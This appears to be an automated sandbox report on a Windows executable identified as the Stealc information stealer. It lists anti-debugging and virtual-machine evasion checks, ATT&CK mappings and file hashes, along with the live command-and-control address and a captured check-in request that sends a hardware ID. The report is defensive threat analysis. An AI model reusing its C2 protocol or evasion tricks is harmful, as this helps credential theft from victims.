                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60E02 second address: A60E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979743 second address: 979764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F7CC902C408h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f jp 00007F7CC902C40Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7C1962 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7BF10E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 97569B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A0239D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_005738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00574910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00574910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0056DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0056E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00574570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00574570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0056ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0056BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0056DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0056F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00573EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00573EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00561160 GetSystemInfo,ExitProcess,0_2_00561160
                Source: file.exe, 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1777021191.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1777021191.0000000000E75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13598
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13601
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13620
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13612
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13652
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005645C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_005645C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00579860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00579860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00579750 mov eax, dword ptr fs:[00000030h] | 0_2_00579750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00577850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00577850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6668, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00579600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00579600
Source: file.exe, file.exe, 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00577B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00576920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00576920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00577850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00577850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00577A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00577A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1736083910.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6668, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.560000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1736083910.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6668, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix (numbers in brackets are the signature counts attached to a technique in the report):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter [2] | DLL Side-Loading [1] | Process Injection [11] | Masquerading [1] | OS Credential Dumping | System Time Discovery [2] | Remote Services | Archive Collected Data [1] | Encrypted Channel [2] | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Native API [11] | Boot or Logon Initialization Scripts | DLL Side-Loading [1] | Virtualization/Sandbox Evasion [33] | LSASS Memory | Security Software Discovery [641] | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer [2] | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools [11] | Security Account Manager | Virtualization/Sandbox Evasion [33] | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol [2] | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection [11] | NTDS | Process Discovery [13] | Distributed Component Object Model | Input Capture | Application Layer Protocol [12] | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information [1] | LSA Secrets | Account Discovery [1] | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information [3] | Cached Domain Credentials | System Owner/User Discovery [1] | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing [12] | DCSync | File and Directory Discovery [1] | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading [1] | Proc Filesystem | System Information Discovery [324] | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.php- | file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/X | file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpU | file.exe, 00000000.00000002.1777021191.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1777021191.0000000000E87000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1525249
Start date and time: 2024-10-03 23:40:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 86
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sls.update.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                          No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | Setup.exe | Get hash | malicious | RedLine | Browse | 185.215.113.22
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                          No context
                          No context
                          No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.950513255384338
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'862'144 bytes
MD5: 622f9f481586d5dca1356051e20c13fa
SHA1: 4e56e103cdb596ddad6076de8132d9839abd0b3d
SHA256: 75e9d83e734f70de74b22032c01c7adee9bc2b0244ab7506bc59c5adc27d81a6
SHA512: 52b3dbee0cba1207b3698ebfb01c454f246b455f6f05d376dae0d987005f378d65ecc5e7ce744ec8810c27123ec107a064acfabce5dea01e723b2f4053cb7c03
SSDEEP: 24576:TTXLRC8M7zGSJ4quoGdAgo1nwoHkMmbey+qwrfy3CPP2VudSDrdqbp9PdA6+ttne:/FCU84quoYhumDzwXnWZya6GtnZajb
TLSH: 1F8533C94C6A355CC3925A72A361E344ACDB22ACB2B1F6F1FC9D5874003D23C5B5DA67
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xaac000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | da35ddfd32e200c82814876e90a053a9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2ac000 | 0x200 | 15e943e5d082af8bdad13ed1d783d727 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zlxgcsga | 0x50a000 | 0x1a1000 | 0x1a0800 | 570e3832bc7fcb1b9effa596888ef6ac | False | 0.9952391112695078 | data | 7.954773553476413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bzmpgjce | 0x6ab000 | 0x1000 | 0x400 | 86b94df750f202dd99b47fcc295fbde9 | False | 0.7939453125 | data | 6.1091249925867395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6ac000 | 0x3000 | 0x2200 | f9d2d9dca30b8443a33ad9f3dfee3dee | False | 0.06652113970588236 | DOS executable (COM) | 0.6906821994888898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-03T23:41:06.892569+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 3, 2024 23:41:05.946213007 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 3, 2024 23:41:05.951776981 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 3, 2024 23:41:05.951909065 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 3, 2024 23:41:05.954422951 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 3, 2024 23:41:05.959692955 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 3, 2024 23:41:06.661855936 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 3, 2024 23:41:06.661987066 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 3, 2024 23:41:06.664355993 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 3, 2024 23:41:06.669243097 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 3, 2024 23:41:06.892340899 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 3, 2024 23:41:06.892569065 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 3, 2024 23:41:10.283512115 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
• 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 6668 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 23:41:05.954422951 CEST | 89 | OUT | GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Oct 3, 2024 23:41:06.661855936 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 21:41:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 3, 2024 23:41:06.664355993 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGI
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 30 42 35 30 34 37 33 32 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 44 41 41 41 4b 4a 4a 44 42 47 43 42 46 43 42 47 49 2d 2d 0d 0a
Data Ascii: ------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="hwid"F80B504732BC4158135236------CGIDAAAKJJDBGCBFCBGIContent-Disposition: form-data; name="build"doma------CGIDAAAKJJDBGCBFCBGI--
Oct 3, 2024 23:41:06.892340899 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 21:41:06 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=


                          Target ID:0
                          Start time:17:41:02
                          Start date:03/10/2024
                          Path:C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\file.exe"
                          Imagebase:0x560000
                          File size:1'862'144 bytes
                          MD5 hash:622F9F481586D5DCA1356051E20C13FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1777021191.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1736083910.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:true

                            Execution Graph

                            Execution Coverage:9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:9.7%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:24
